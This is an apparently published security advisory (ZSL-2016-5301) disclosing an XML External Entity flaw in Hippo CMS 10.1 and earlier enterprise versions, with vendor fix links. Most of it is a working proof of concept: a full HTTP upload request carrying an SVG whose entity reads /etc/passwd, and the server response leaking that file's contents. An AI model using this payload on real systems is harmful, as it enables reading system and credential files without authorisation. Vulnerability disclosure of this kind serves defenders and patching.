Hippo CMS 10.1 XML External Entity Information Disclosure
Posted on 01 February 2016
Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability Vendor: Hippo B.V. Product web page: http://www.onehippo.org Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition) Summary: Hippo CMS is an open source Java CMS. We built it so you can easily integrate it into your existing architecture. Desc: XXE (XML External Entity) processing through upload of SVG images in the CMS, and through XML import in the CMS Console application. Tested on: Linux 2.6.32-5-xen-amd64 Java/1.8.0_66 Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5301 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php Vendor: http://www.onehippo.org/security-issues-list/security-12.html http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html 04.12.2015 --- [Request]: POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1 Host: 10.0.2.17 User-Agent: ZSL_Web_Scanner/2.8 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg Content-Length: 2101 Content-Type: multipart/form-data; boundary=---------------------------20443294602274 Cookie: [OMMITED] Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -----------------------------20443294602274 Content-Disposition: form-data; name="id1a0_hf_0" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item :view:1:item:value:widget" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item :view:1:item:view:1:item:view:1:item:value:widget" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item :view:1:item:view:2:item:view:1:item:value:widget" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left :view:1:item:view:1:item:value:widget" asd -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left :view:2:item:view:1:item:value:widget" hhh -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left :view:3:item:view:1:item:panel:editor" -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right :view:2:item:view:1:item:value:widget" hhh -----------------------------20443294602274 Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right :view:3:item:view:1:item:value:widget" hhhh -----------------------------20443294602274 Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="yes"?><!DOCTYPE zsl [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ] ><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999 /xlink" version="1.1">&xxe;</svg> -----------------------------20443294602274-- [Response]: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www .w3.org/1999/xlink" height="7" version="1.1" viewBox="0 0 500.0 40.0" width="98"> root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync *** *** *** *** </svg>